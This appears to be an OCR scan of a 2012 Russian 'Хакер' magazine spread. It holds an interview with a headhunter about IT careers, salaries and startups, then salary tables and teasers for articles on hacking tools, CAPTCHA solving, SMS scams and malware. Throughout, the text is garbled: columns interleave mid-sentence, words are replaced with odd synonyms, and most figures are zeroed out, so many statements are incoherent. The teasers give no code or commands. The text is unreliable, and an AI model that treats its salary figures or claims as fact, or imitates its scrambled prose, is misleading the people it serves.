мист сверху

Хантер заурядно знает Но относительная технических

Буквально только что у меня три дня безвыгодный работала

сnециалистов - сыны Земли неnублич-

чинающий , что-то около во вкусе в ту же минуту сие

счел меня каким-то

ные. Рекрутеру ужас хоть в гроб ложись предварительно ни х добраться, ибо аюшки? они закрыты

того, во вкусе автор разместила объяв ление в отношении том, который

среди комnаний. К nримеру, во мэрии

:1

В результате

работает

000

ление. Когда наш брат видим вакансию

про RuЬу-nрограммиста из-за

nрограмм истов, только равно как

пания его никак не найдет. Однако во обзорах

твоя милость перед них достучишься? Как всыпать

сотрудников, вследствие этого что такое? пишущий сии строки отнюдь не успевали раз­

поперед того человека, какой на практике сидит

бирать почту. Пи сьма падали таковский лавиной,

да кадит nочту отдельный день? Это nрактически

сколько целый

невозможно.

си дел равным образом разбирал их неделю .

00 тысяч,

я понимаем, что-то вслед такие денюжка ком­

пришлось немедленно нанимать дополнительных

PRUFFI

000 тысяч

самое востребованное наnрав­

страшным спамером . А от л училось зто со временем

наш брат ищем людей пользу кого Google.

безграмотный может

рублей, когда спирт безграмотный положительно на­

Бывают дни, от случая к случаю у меня «сносят» почту.

Gmail

Ruby

вставать в копеечку мень ше

всего-навсего публичных людей.

почта, ибо сколько

выше, нежели во анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, на результате а итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый системщик знает такого но второ­

вакансии. В среднем иногда где-то

го . Он знает, что такое? вона этот- блестящий програм­

Если ваша милость можете исходить работатьврунет­

откликов, хотя вплоть до ходит да по обвалов. Летом была

мер , а этот- <<сачок» равно сносно уделывать безвыгодный будет.

шагом марш на рунет! Ни единственный директриса безграмотный довольно этак

незамещенная должность управляющего на венчурный фонд­

Мы открываем вы вакансии- рекомендуйте

эволюционировать , вроде рунет равно

пришло возле

своих друзей нате сии вакансии . Это работа,

000 откликов из-за пара дня .

В среднем одну вакансию вает с

00-60

PRUFFI

00 000 по 00 000 личность

но. То очищать автор давнёшенько сделано СМИ.

просматри­

ежеднев­

:1

IT

во целом.

а любая усилие должна бытийствовать оnлачена. Если

У крупных порталов век жуткая голод

возлюбленная сделана усnешно да наша сестра устроили человека

людей, особенно технических сотрудников .

по мнению вашей рекомендации , ты да я вы заплатим. То принимать заборщик nеречислил нам копейка

Это богатые компании, равно у них блистает своим отсутствием ограничений

чаятельно << на этом году автор воэьмем лишь только

следовать хантинг. Мы , никак не раскрывая клиента, рассказали вы по части том, сколько снедать такая

замечательная вакансия. Вы кого-то

00

чело­

век, да невыгодный больше!>>. Они берут многих равным образом заин­ тересованы умереть и малограмотный встать всех, у кого снедать необходимый уровень комnетенции равным образом адекватность.

nорекомендовали и, буде важно

Хантер невыгодный является носителем

сделали свою работу, nолучили

какой-то супертайны равным образом су­

плата

перэкспертизы. Что прежде нас

0000 евро.

Это

чем демон не шутит нам сnраведливым.

представлял из себя непервоклассный

Если вам выбираете, нежели разрабатывать во рунете,

да у вы примерно одну крошку общематематический склад ума- учитесь программить. Даже разве дальше

вас никак не будете nрограммировать, значимость пре­

хантер? Очень д орогой

Раньше после рекомендации

дакта [Pгoduct Manageг'al, тот или иной на прошлом

костюм, суперджип- на се нате похититель оты.

последняя вязальная игла в колеснице невыгодный платил. Н в рассуждении на результате нашего

Он приезжал, выкладывал ай пади к,

подхода что до гр омный кубатура данных оспе­

центов сверху

айфончик равно единаче

циалистах, насчёт профессионалах , вышел

заключить сделку из nрограммистами. Наnрим ер,

открыто .

аз многогрешный никак не смогу со ними договориться- все в одинаковой степени какой

05

молескинчикав

равным образом говорил клиенту: <<Мои услу ги стоят

Мы заявили, который неважнецкий <<офигенной

00.

Почем у? Пот ому, зачем вас сможете

nрограммер меня обманет.

три оклада кандидата, вследствие чего аюшки? моя особа об­

ладаю офигенной эксnертизой».

сие умел, хорош много выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» иначе говоря <<чтобы сие сделать, нужно

твоя милость во топовом сегменте рунета. То принимать

двуха возраст >> [хотя во реале- три дня), равным образом ваш покорный слуга ему nо­

буквально: <<Э та отношение со т оит рублей на месяц. Эта овчинка выделки стоит

эксперты нате рынке- всегда вы. Для сего автор

Через нас семя узнали по отношению величине компенса­

nридумали прибавление с целью социальных сетей

ций вице-nреэидентов nорталов: таким образом nонят­

Рунет медленно был закрытой системой, идеже

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, что-то тоn-менеджеры nолучают через

вершиной карьеры была вещь во Яндексе . То

03/158/201 0

рублеЙ >>.

верю. Если вас разбираетесь во коде, вас хорэ

экспертизы» невыгодный существует. На самом деле

ХАКЕР

000 тысяч

000 тысяч

000

тысяч

неизмеримо легче. И вашей команде тоже.

031


.. COVERSTORY есть твоя милость шел-шел, равно становилось ясно: на конце

Смотрите нате общество от точки зрения «мобиль­

отлично что касается зарплатах ото

концов тебе нужно придвинуться во Яндекс, пофигарить

ности». Доступ ко интернету от компьютера

понятно- куда большая уровень ответствен­

в дальнейшем работать- да ради тебя сие довольно санаторий.

уходит во прошлое. Он, конечно, да опосля бросьте

ности. У нас были такие требования ото банков, ко ­

Яндекс был чем-то по-видимому Олимпа! Боги совершенно

прилагаться с целью посещения интернет­

торые проходили, видимо, согласно верхней границе

сидели на Яндексе. Они как от таким рас­

ресурсов, только снова год-два, да лаптоп

четом строили родной НR-бренд: всегда сии гамаки,

перестанет бытийствовать основным устройством

бесплатная блюдо равно другие бонусы. В коридорах

в целях этого. Такими устройствами ста-

со временем можно' повстречать Илью Сегаловича . При­

новятся мобильные равным образом планшетники.

глашение потеть над чем во Яндексе было равносиль­

Почему сие мирово не без; точки зрения

да тому, в чем дело? для тебе спустился Зеве равно погладил

карьеры? Потому, что-нибудь програм-

тебя по мнению голове.

:1

И во Яндексе фактически

диапазона

000 000

рублей равным образом за пределами . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- эдак

000-120

тысяч . Бывали требования равно с системных интеграторов, дальше приблизительно примерно

040

тысяч . Это цены по части Москве.

мисты, да продакт-менеджеры,

неплохо . Но сие давным-давно неграмотный единственная воз­

да всё, почто теперича делается про

можная конечная степень карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое идеал

liOS, Windows

-быть программ истом.

Перестаньте варить на рамках рунета. Интер­

Phonel,- всё востребован но. И хорошенького понемножку

Вы понимаете основные положения бизнеса, элементы

недостает стал международным. В Россию пришли

востребован но. Зарплаты растут объединение во всех отношениях

профессии, вы полегчало общей сложности подымать

всегда ведущие компании, а кто именно безграмотный пришел, оный

направлениям.

равным образом растить. Ведь бизнес- симпатия безвыгодный относительно сер­

придет во перемещение года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

к русского

Интернетстановитсявсёболеесегмен­

Это равно очищать платформа. Поэтому, ежели вам

интересах

тированным. Раньше ваша сестра могли созидать

умеете программить, ваша продвижение довольно

Facebook да Google, да мы со тобой искали Fouгsquaгe, для того Linkedln да многих других

компаний. Неважно, придет ли шатия сама,

карьеру следующим образом: настоящее автор этих строк

двигаться настолько, как вас за­

равно как

РМ

хотите расширяться да до какой степени этому помешает

Linkedln,

сиречь купит какую-то другую ком­

IProduct manageri, грядущее занимаюсь

панию, на правах сие есть Gгoupon. Прис утствие

маркетин гом , послезавтра- вновь РМ,

будет! Поэтому погоди для круг шире, возьми глаза в зубы

тогда суммарно передовой редактор. Сей-

личная жизнь.

получай мировые тренды- сие поможет тебе равным образом на

час, ко сожалению другими словами ко счастью, всё хлеще

У программиста бессчётно путей развития.

карьере во волюм числе.

надо узкая специализация. Тот но марке­

Первый- вам можете всю бытье не надышаться на кого код.

тинг начинает разветвляться в кучу направлений:

В таком случае ваша милость сперва становитесь nро­

Я малограмотный считаю, что такое? возлюбленный разделен нате нашу Пре­

во трафик, чисто контент, вона брендинг да таково

грамм истом, далее руководителем группы, по­

красную Страну да круглый прочий ад. Уверена,

далее. Надо отобрать одно направление: ежели

книга руководите разработкой крупного портала.

зачем человеку необходимо являться любопытно мучиться

высшая отметка парение отдавать ваша сестра могли бы тихонько nерейти

Это ежели ваша сестра далеко не хотите останавливаться. Или

равным образом призанятно расти, зачем возлюбленный самопроизвольно властен баллотировать .

изо сегмента брендинга на сегмент, связанн ый

другой вариант- на первых порах вас работаете про­

Зарплаты !именно во интернет-сектореl у нас

вместе с трафиком, ведь теперича сие довольно будет

граммистом, а попозже РМ'ом технологического

в тот же миг сравнимые, а чаще пусть даже выше, нежели

сложно.

nроекта. Затем делаете частный стартап или, ежели

получай Западе. Если человеку безотлагательно пожалуйста по­ работать на центре игровой индустрии во

Zynga-

сие технологическое указание вообще Винтернет nришло обилие невыгодный интернет­

сие понятно, равным образом сие его выбор. И если бы возлюбленный уезжает

ных компаний. Например, МТС вместе с

сообразно приглашению

<<Связной» не без;

Zynga,

этак в качестве кого пароходство в этом месте

Enter.ru

Omlet.ru,

равным образом т. д.- их ахти много.

выделяется на один затея возле портале, руководите уж целым направлением. Класси­ ческий пример- Леша Терехов. Его автор нашла,

безвыгодный работает,- сие равным образом его запас .

Они заинтересованы во привлечении

Не вижу после этого никакого предательства.

большого количества людей . Денег

риант- ваш брат можете беда растянуто расти, а nотом

у них как и много, они пусть даже могут вы­

конституция в сущности евангелистом какого-либо

делять внутренние стартапы.

наnравления, по образу Гриша Бакунов на Яндексе.

PRUFFI

открыла стартапы как бы точку

развития. Но стартапы равно как нужно

нет-нет да и дьявол был во маленьком стартапе. Третий ва­

Ну да конечно, ваша милость можете присутствовать программистом,

разделять. С точки зрения найма

Не бойтесь отъезжать проходить в соответствии с хоро­

подойти на технологическую компанию да достигнуть

наша сестра выделяем двум категории стар­

шим, интересным зарубежным про­

впредь до ее гендиректора.

тапов: не без; инвестициями по $500 000 и сильнее $500 000. Но сие только лишь сам

граммам. Вы завсегда сможете вернуться,

равно на качестве классического примера на этом месте

коли захотите. Но вернетесь больше

не возбраняется nривести Дмитрия Гришина, какой

изо критериев. Очень с гонором растолковать

востребованными. Более того, смо­

начинал на

молодому человеку, что отнюдь не денно и нощно

жете, скорехонько всего, взвить после этого денег

генерального директора

самопроизвольно важно сие понимает, что-то малограмотный нужно

равно вернуться еще малограмотный во статусе наемно-

исходить на плохую компанию: после его об­

го работника, а во статусе создателя

манут, ничему неграмотный научат

бизнеса. Классический

равно заключая склифосовский стресс,

nример-СергейФаге

гадес равно всё плохо.

да его

Ostrovok.ru.

Таких

примеров изрядно много.

Шансов немедленно много! Ты можешь подбирать направления для развития. То есть, условно говоря, коли тебя неграмотный взяли во Яндекс

По сравнению вместе с объемами с информационной безопасно­

-это безвыгодный ликвидация света . Если в тот же миг

стью, незначительна равным образом несерьезна.

тебе тянет коптеть согласно найму, в таком случае

Спрос получи и распишись специалистов, эанимающих­

дальше, возможно, захочется вскрыть

свое профессия lи коли сие полноте интернет/IТ, мы, опять двадцать пять же, nоможем!. Потом, кабы стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, зачем спирт растет,- факт.

Это четвертый вариант,

а немедленно занимает шутцпункт

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

0. Ruby- после

время года востребованность програм­

мистов выросла возьми

больше нежели на общего бизнеса ниша, связанная

:1

0.

06 %,

а зарплаты поднялись

00 %.

Всё, который связано не без; мобильными платформа­

ми,- да разработка, равно маркетинг.

0. 4.

Весь геймдев. Всё, в чем дело? связано из

e-commerce,-

вот с­

требованность равным образом зарплаты вслед окончательный год выросли больше нежели нате

00% . Это

линия

особенно востребован но.

Особенность зарождающегося тренда со­

довольно удачным, ты, возможно, продашь операция

целесообразно на том, который диапазон зарплат нечеловечески

равным образом вернешься для работе в соответствии с найму, только ранее ничуть

велика: сложность может варьироваться с адски

засада

в другом уровне . Мы показываем «объемную

короткий давно фактически крупной. Когда

мобильные да планшетные устройства начинают

картинку», а на многих людей сие жуть имеет большое значение .

приходят подобные требования иэ банков, спич

всё активнее употребляться интересах доступа для ин-

032

Наблюдается острая недостача разработчи­

iOS

да Andгoid. Бизнес почувствовал, аюшки?

ХАКЕР

03/158/2012


Интервью из ведущим хедхантером рунета

тернету за стационарных компьютеров .

ни засада на Москву и, для примеру, скомпенсировать

равно скажут: <<Вот тебе квота во компании да не­

Отрасль оказалась ко этому никак не готова ни на плане

трудозатраты нате съем жилья, а грешно сказать, что-то

сколечко миллиардов, ступай делай собственноличный

количества, ни во плане качества специалистов.

сие массовое явление. Однако такие случаи

НR-дивизион>> , мы что, откажусь? Нет. Нужно

Результат- язвительный величина востребованности

учащаются.

лошадь родимая , что-нибудь общество немедленно плен шансов. Шанс

В всякий больший компании во всякое время глотать люди,

состоять активным, воеже вздуть объективная возможность

Уменьшается мода РНР-шников

которые уж переросли поверхность работы

этого. Хотя бы организовывать благ.

равно Регl-программистов. Если ваша сестра занимаетесь

согласно найму. Это ценные сотрудники: от ними всё

равно зарплат мобильных разработчиков.

может народиться на первый встречный день, равным образом архи важнецки

Регl, вероятно, вас нужно подумать, получи и распишись какой­

хорошо, да уйти их во наемных сотрудниках

В случае со блогом имеет принципиальное значение лошадь мать, аюшки? дьявол

так шлепалка переходить. Скорее всего, возьми

сделано не лещадь силу . Не помогут никакие задачи

может потеть над чем наравне бери тебя, беспричинно равно против.

на правах задним числом Регl перешагнуть в «Рельсы>> проще,

равным образом никакая зарплата, потому как они хотят что­

Не должно писать: << Я понятливый равным образом всё знаю , а вас уны­

нежели бери С++ тож

так свое. Димитрий Гришин с Mail.гu решил:

Ruby,

где-то

Java .

лое говно! >> Нет! Благ может охватывать хоть

автор сделаем особый кувез для того таких Интернет-сам до себя тренд. Весь . Всё раз­

людей, дадим им оплачивание равно не­

летается по образу горячие пирожки .

обходимую инфраструктуру, с тем они

весть жесткую критику, однако лишь конкрет­

ную равным образом обоснованную. Например, можно написать что-нибудь может статься <<этот интер­ фейс неточный в силу того что да потому,

могли разрабатывать своими проекта-

ми . Если у людей во конечном счете

ПРО ПЕЧЕНЬКИ

а строгий принуждён выглядеть так>> . Если около этом рекомендовать

околесица никак не получается, им заново

Помимо конкурентной зарплаты да интересной

предлагают работу сообразно найму. Если

работы, всё чаще предлагают гнущийся график.

но получается, Mail.гu Gгoup весь

Это значит, сколько у тебя снедать некоторое количе­

могает взнестись этому проекту

ство <<присутственных дней>>, следовать которое твоя милость

максимально высоко. Компа-

долженствует откорячиться определенное сумма

ния дает многое, забирает

часов во офисе. Это важно, сие командная рабо­

нимало небольшую долю

та- твоя милость долженствует со кем-то якшаться равно беспричинно далее.

равно позволяет людям

родной вариант, ведь короче вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы всего только что такое? критиковали, вас да позовет.

Всё остальное миг твоя милость можешь заниматься идеже

уделывать черт-те что свое. Одним изо таких про­

Я самоё конец числа равным образом постоянно хантила

хочешь. У тебя просто-напросто питаться задача, которую твоя милость

ектов безотлагательно является услуги микро­

получи и распишись технических конференциях. Я

в долгу выполнять.

блогов Futubгa lfutubгa.com].

бедно сколько понимаю после возьми технической секции, же вижу мальчиков от горящи­

Компании безотлагательно числа учат равным образом отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, для примеру,

по отношению ко всему отнюдь не было: чуть-чуть кто именно был заинтересован

Если единица ищет работу, моя персона сове­

Горя Сысоев, а мальчонка с зала за­

на системном обучении своих людей. Сейчас но

тую располагать вывод везде. Хуже

дает ему открыто справедливый вопрос- я к нему подхожу, даю автомат да зову

компании весь чаще стали призывать зару­

далеко не будет. Поиск работы- сие та но

бежных технологических наставник про внутренних

самая работа. К ней нужно взглянуть

для нам в тестирование. Даже разве

выступлений . Это ахти престижно равно важно.

ответственно.

ваш покорнейший слуга малограмотный перед конца понимаю самостоятельно вопрос,

На внешней конференции безупречный разработ­

Не ленись отмечать на компании на­

чик чаще лишь закрыт

прямую. Составь инвентарь компаний ,

до реакции докладчика аз многогрешный вижу, ась? дьявол

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение об неразглашении).

которые тебе интересны. Не нужно циркулировать

Все более-менее приличные зарплаты, наравне

Он не мудрствуя лукаво отнюдь не имеет полномочия задавать многие

по всем статьям стандартное письмо. Напиши , с какой радости

правило, закрыты определением «цена дого­

вопросы. Все автор сих строк сверху конференциях выглядим

твоя милость хочешь трудиться особенно на этой компании .

ворная». Есть причина- чтобы них существует

в качестве кого дураки: околесица ценного выговорить отнюдь не можем,

Например: << Я хочу на Островок.ру, отчего в чем дело?

вилка. То поглощать у

ибо в чем дело? сие может помочь нашему бизне­

считаю оный стартап аспидски перспективным,

утнапиштим установки <<мы нанимаем чувака вслед за

су. Поэтому наша сестра говорим какие-то банальности.

ми нравится, на правах формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

во таком случае блистает своим отсутствием конкрет­

00

Когда такого учитель привозят во компанию, разра­

Вообще , ми интересна туристическая тема,

поглядим чуваков на диапазоне через

ботчикам спокойнее- ноль без палочки нисколько далеко не укра­

равно мы люблю программировать для

тысяч. Если эксперт склифосовский куда благоустроенный

дет. Они могут со спокойной совестью говорить, взвешивать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если твоя милость напишешь на

00.

050,

00

вплоть до

020

ежели отнюдь не очень-запла­

Вот на этой вилке они свободны.

00-15 компаний, ведь 0-4

Стартапы пришли не без; модой рекомендовать опцио­

пригласят в собеседование. Найти адреса

ны. Раньше нахватать соглашение было беда слож­

нисколько безыскусно : они принимать в сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще ряд полет взад считалось, что-то

однако да престижно. Их давали Яндекс, Mail.гu, и в этом, наверное, не грех подвести черту список.

Принцип «я продаюсь раз в год по обещанию на три года» сделано

К сожалению, без дальних разговоров получи и распишись рыночек входят стар­

невыгодный актуален. Мы продаемся всё время, автор по сию пору

Но когда твоя милость учишься на Бауманке равно nри этом ра­

тапы почасту со некоторым непониманием. Одно

-товар. Если завтрашний день ко ми придут с

ботаешь во Макдональдсе-это плохо. Не могу

Google

выучивать да трудиться одновременно- хорошо.

дело, буде твоя милость десяток планирование работал на Яндексе и получил один оп циан, да другое- три меся­ ца в некоторой степени покодил на Островке равным образом в свою очередь получил

оп циан. Мне кажется, сие неправильно. Оп ци­ ан надо являться аспидски ценной вещью, иначе и многоценность самой компании где-то падает. Большое наличность компаний не долго думая ищут сотрудников во регионах. Ищут как бы к фи­ лиалов, где-то равно без затей для того удаленной работы. Иногда компании готовы переместить сотруд-

ХАКЕР

03/158/ 0012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, что такое? аз многогрешный зто осуждаю, чай ситуации

ший из тартап. Хороший отнюдь не на плане успешности

П отому, ась? лю д да н е предста на ляю т, каков

у людей бывают разные, да по временам сие прямо

со точки зрения бизнеса - потенциального

нате самом д насилу интернет. Они невыгодный пре д ставляют,

вопросительный знак выживания.

работодателя сие немножко интересует. Крупным

в чем дело? нате самом д еле-еле нужно, а вдобавок отнюдь не со ­

размеряют собственные силы да не без; р едс т ва.

компаниям незначительно значительнее различить на вы

Работать изумительный минута учебы как собака желательно бы

человека, какой-никакой мыслит на правильном

н е за денег, а в целях выбора т ого, нежели зани ­

направлении равным образом умеет льстить руками.

м а т ьс моя особа на ~удущем . Это отличное время, дай тебе

Порталам нужно всё, в чем дело? связано

сложиться из направлением дальнейшей

из техноло г иями, видео, мобильны-

Н е хва т ает в рассуждении п ыта, св ваш покорный слуга зей, те рп е н ия, денег да всего делов п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- автор во акробат воздуха заметим.

ми платформами, социальными

деятельности.

Идите трудиться во большую, серьезную компанию, идеже вам

сетями, - сие основные вещи,

Д алеко безвыгодный всегда из первого раза нащупывают,

которые востребованы завсегда

ась? хотя бы т. Е сли, суще студентом, твоя милость меня­

равно всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу единожды во три месяца- сие безграмотный страшно. Ты сам не сознавая нащуnываешь, что такое? хочешь . Что

Че м может бытовать любо-дорого глядеть

самое важное : для последнему курсу твоя милость должен,

первы й стартап? П ока

поработав на разных местах равным образом пройдя стажи­

ваш брат учитесь, предполагать , во Бауманке, вам

отнюдь не не без; н изу. Вы посмотрите т е изо того же Ян д екса, M ail.гu, изо какой-либо из-за п а д­

посмо т рите наинтер н ет не вз гля д ом стыд ента,

ровку во разных компаниях, определиться, кем

кое-что делаете, ваш брат пробуете. Вы смо­

твоя милость хочешь бы т ь. Услов н в отношении говоря, «маркетинг

трите да понимаете, почто вы интересно,

утнапиштим компа н ии, так нашел ть све р ху. Пл законник вас

-не мое, верстка- малограмотный мое, а гляди создание

набиваете первые ши ш ки.

обрастете связями, на е д ь л юбой п по части р та л

дает куда хорошую во озможность об ­

-да!>>. Вот сие полноте хорошо. Не н адо что касается г ромного количества тусовок

подниматься связями.

К по части ко ончанию учебы мирово увеличить свою

кажется стартаперски х. Люди немного погодя никак не ра­

те х ничес для ую компетенцию . Или, продукто­

ботают, они ходят равным образом трындят ни что до нежели .

У вы будут связи, у вы короче по­

вую, разве твоя милость РМ, не так — не то маркетин г овую, кабы

Ц енность таких людей нулевая.

нимание, ваша сестра обрастете костяком

Меня пугают люди, которые во

друг, автор не без; ним эль 3 л >>. Б удило е т д ругое:

команды. Н е хорэ во по части т э т насчёт г о: «Э т насчёт мои

специализируешься бери маркети н ге.

09 планирование

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я эксперт соответственно формиро­

<<Это офигенный программ ис т, аз многогрешный из ним

бэкграунд , лучше г овс~получится .Затакими

ванию бренда!>>

работал во одном отд еле, автор сих строк сош л ись

не без; ним получай общей теме, равным образом нам занятно

людьми гоняются крупные порталы равно старта­

пы, набирающие обороты, - все!

общаться>>. У вам поя во ится какое-то коли­

О СТАРТАПАХ

игра т в вместе с во о дн ых дене г- сейте ч искусник на р у н е т е

Н е ст оит относительно не без; обенно ра из из ч ит ы вать возьми стажиров­

Большинство стартаповна рынке- унылое

здорово зарабаты на ают. Вам если т лег ч е лещадь ­

для у во большо й компании. Все порталы пред­

г ов н по отношению . Именно следственно у нас присест на полгода вы­

нять инвестиции, кабы вас скажете: << Я три го д а

лагают стажировки, однако держи деле безграмотный адски

ходит чарт

«30 лучших

команд стар­

любят занимать стажеров, беспричинно в духе со ними

тапав Рунета>>. Зачем автор его выпускаем?

кушать вишь ёбаный проекп>. Вам, ско р ее , д аду т сии

программ равным образом л почту во Я н дексе, а в эту пору у меня

надо маяться равно определять

Затем, аюшки? без дальних разговоров ужас целый ряд «nены>>,

деньги, отчего зачем у во мастер своего дела сделал т ь известный п в рассуждении дт на е р ж ­

чтобы них фрагментарный работник ден ь , почто недовольно

как-никак базар токмо развивается. И весть

д енный по отношению п ыт да вы, веро ятн о, д ейс твит е л ь н по части

кого устраивает .

не фунт изюма отнести за счет молодому человеку, ко­

в некоторой степени со д елае т е.

торый безграмотный постоянно самопроизвольно неплохо сие понимает,

У большинства порталов немедленно вместе с у ще­

который малограмотный нужно переться во плохую компанию :

Я считаю, почто приманка стартапы нужно выделывать по­

от твуют школы да у ч енические програ м ­

с годами обманут, ничему далеко не научат равно не выделяя частностей

сле

м ы . Например, у Яндекса поглощать Школа

хорэ «стресс, преисподняя равно всё плохо>> .

анализа данных. Если здорово пройдешь отучишься, тебе от великоватый ве­

ста р тапы. Хотя нет, неграмотный так. Д е­

роятностью предложат работу.

лайте стартапы, однако никак не связывай ­ те со ними свою основную карьеру.

Фактиче от ки ни у кого, кто именно начи н ал

со ебянаолимпиа д а х попрогра м ми­

Google- немного погодя

есть т ь специальные

подразделения в целях студентов . Если твоя милость

здорово себя показал, тебе за единый вздох а сделают предложение.

Мало компаний после сие берется. У н дока очищать р яд программ, на томишко числе платная п ро г рамма

со льготными расценками ради стартапо во . Е сть и бесплатная, всем миром вместе с Gгeenfield Pгoject. Мы всё так же изначально оце н равным образом во аем, насколь ­

Можно что касается ч ень ладно представить

Mail.гu,

на первых порах поработав.

Мы аспидски неоднократно ищем людей чтобы стартапов. Скажу страшное- безвыгодный делайте

такую программу равным образом ладно

рованию . Они проводятся на Яндексе,

08-29 лет,

от вою карьеру со стартапов, синь порох

н е полу ч илось . Нужно взяться гением уров ­ ня Цукерберга, однако позднее равно никакие миропонимание

ко старта п живучий. Е сли стар т ап закон л ь­ ный, только у него в эту пору п рос ведь н е т д е н ег, ч т об ы получи и распишись м платить, наша сестра пиарим вакансию ради счисление своих

возможнос т ей.

к вам не насчет частностей отнюдь не действуют. Спасибо, что-то

ваша милость легко есть!

:1

Стартапы сверху семенной стадии- сие умереть и отнюдь не встать многом дело хантеров. Потому сколько вероятность получи и распишись этапе реа­

Ст удент, для а для н да странно, мо жет учинить хоро -

Почему безвыгодный п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный чалтык ко постоянно связан со командой. Сделают сии человечество программа либо нет, смогут либо — либо

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

никак не смогут? Оценить всё сие получи старте, хеджи­ ровать сии риски весьма во ажно. П оэ т ому, когд а старта п ы толит ь ко держи ч аль зарож д атьс автор этих строк ,

агентство

PRUFF I было

п ер на ым, кто именно п в отношении ш ел

нормировать всё сие не без; точки зрения л ю д ей. М ы очень несть сделали во этом смыс л е, поэтому,

конечно, нам было небезынтересно ознакомиться старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 0011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

0-5 пет

0-10 пет

бопее10 пет

00 000- 00 000

00 000- 050 000

070 000 - 050 000

050 000 - ...

00 000- 00 000.

00 000- 080 000 .

080 000- 050 000.

050 000 - ...•

0-5 пет

0-10 пет

бопее10 пет

00 000 - 00 000

00 000 - 00 000

00 000 - 000 000

000 000 - ...

Unix,Linux admin

00 000 - 00 000 20 000 - 00 000 •

00 000 - 00 000 60 000 - 00 000 •

00 000- 010 000 90 00 0 - 010 000 .

010000- ••• 130 000 - 050 000 .

DBA (Огасlе, MySql, Postgгes да

'о ооо

- 00 ооо 40 000 - 00 000 •

00 000 - 030 000 80 000 - 030 000.

030 000- 050 000 130 000 - 050 000 .

050 000- 080 000 150 000 - 080 000 *

Team

leadeг

0-3

годы

Разработчик около ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

возраст

управляющий

т.д.) Руководитепь группы системных администраторов

GAME

00 000- 050 000

050 000- 080 000

080 000- 050 000

00 000- 050 000.

050 000- 080 000 .

080 000- 050 000 .

0-5 пет

0-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

0 опытность работы

0-3

лета

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась для прежнемуровне

востребованность увеличилась не столь нежели получай 00 %

востребованность увеличилась сильнее нежели сверху 00 %

востребованность уменьшилась не в таковой степени нежели получи и распишись 00 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

03 страницы журнала получи и распишись одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров по мнению самым низким ценам - идеже уже твоя милость найдешь такое

предложение, неравно никак не во китайских интернет-магазинах? Такого в отлучке даже наеВау!Близостькпроизводствуи огромная соперничество играют возьми руку

покупателям. Из Китая дозволяется ради казать самого линия да согласно самой низкой цене. При этом тебе далеко не нужно морочиться с оплатой доставки - всегда изо д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий изделие твоя милость можешь от минимальным

риском. Обсудим да мы не без; тобой да важные советы по он лайн - пок у п ка м от уче часть специфики поставщиков с Поднебесной.

взламывание

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

0CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

вынести решение САРТС Н А. Как сие проделать безо

розыск уязвимостей, лесоэксплуатация дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

объезд 005 - только малая деление того, н а что такое?

задачки интересах хакеров. Мы решили их по­

ных сетей равно ОСR-систем?

способны плагины проектаwЗаf.

воззриться равно одновременно решили.

взламывание

ФАЛЬШИВЫЕ СМ(

Партерка-при м фактически ка-подписка- взгляд изнутри по отношению том, в духе устроены равно получи нежели

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

0011

возраст на

веселых картинках. Кто с разработчиков малвари удовлетворительно ивил антивирусных аналити­

засада хлеще всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 0.5 временно

нет. Но появятся ли они во будущем?

Разбираемся умереть и отнюдь не встать внутренностях новой мобильной ОС с Microsoft.

ХАКЕР

03/158/2012


А АnьФа·Банк

